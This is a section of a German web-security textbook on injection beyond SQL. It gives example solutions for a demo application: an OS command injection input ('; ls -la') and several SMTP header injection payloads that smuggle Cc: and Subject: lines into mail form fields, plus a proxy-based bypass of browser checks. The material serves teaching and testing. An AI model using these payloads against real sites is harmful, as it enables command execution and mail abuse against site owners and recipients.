Kapitel 7 - Injection jenseits von SQL

7.9 - Die Demo-Anwendung

7.9.1 - OS Command Injection

Exploits für ein Verzeichnislisting:
; ls -la

7.9.2 - SMTP-Injection

SMTP-Injection im Kontaktformular

Exploit:

• Cc:-Zeile einschleusen:
  E-Mail-Adresse ist
  mail@server1.example%0ACc:mail@server2.example,mail@server3.example

SMTP-Injection in der Empfehlungsfunktion

Exploits:

• Zusätzliche Subject:-Zeile:
  Empfänger oder Absender ist
  info@tester.example%0aSubject:%20Das%20neue%20Subject
• Zwei zusätzliche Subject:-Zeilen:
  Empfänger ist
  empfaenger@tester.example%0aSubject:%20Das%20neue%20Subject%20vom%20Empfaenger
  UND
  Absender ist
  absender@tester.example%0aSubject:%20Das%20neue%20Subject%20vom%20Absender
• Zusätzliche Subject:-Zeile und neuer Body:
  Empfänger oder Absender ist
  tester@tester.example%0aSubject:%20Das%20neue%20Subject%0a%0aDer%20neue%20Text!

SMTP-Injection trotz Prüfungen im Kontaktformular

Exploits zum Einfügen einer zusätzlichen Cc:-Zeile:

• Angriff von oben:
  E-Mail-Adresse ist
  mail@server1.example%0ACc:mail@server2.example,mail@server3.example
  Das funktioniert nicht, weil der Browser die Eingabe nicht als E-Mail-Adresse akzeptiert.
• Alternative:
  Gleiche Änderung im Proxy vornehmen
• Weitere Alternative:
  Wert in Subject eingeben

Die Links

• [OWASP_NoSQL-TG] OWASP Testing Guide v4: Testing for NoSQL injection
• [RFC_821] RFC 821 - Simple Mail Transfer Protocol
• [RFC_2821] RFC 2821 - Simple Mail Transfer Protocol
• [RFC_5321] RFC 5321 - Simple Mail Transfer Protocol
• [Tayl_10] Phil Taylor; Web Application Security Blog: „Mongodb is vulnerable to SQL injection in PHP at least“

Zurück